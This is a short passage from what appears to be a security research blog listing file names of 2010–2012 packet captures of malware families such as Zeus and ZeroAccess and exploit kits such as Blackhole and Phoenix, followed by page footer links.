- BIN_Vobfus_634AA845F5B0B519B6D8A8670B994906_2012-12.pcap
- BIN_Xpaj_2012-05.pcap
- BIN_ZeroAccess_3169969E91F5FE5446909BBAB6E14D5D_2012-10.pcap
- BIN_ZeusGameover_2012-02.pcap
- BIN_Zeus_2010-12.pcap
- EK_Blackholev1_2012-03.pcap
- EK_Blackholev1_2012-08.pcap
- EK_Blackholev2_2012-09.pcap
- EK_Blackhole_Java_CVE-2012-4681_2012-08.pcap
- EK_Phoenix_2012-04.pcap
- EK_Smokekt150(Malwaredontneedcoffee)_2012-09.pcap - credit malware.dontneedcoffee.com
More info
Subscribe to:
Posts (Atom)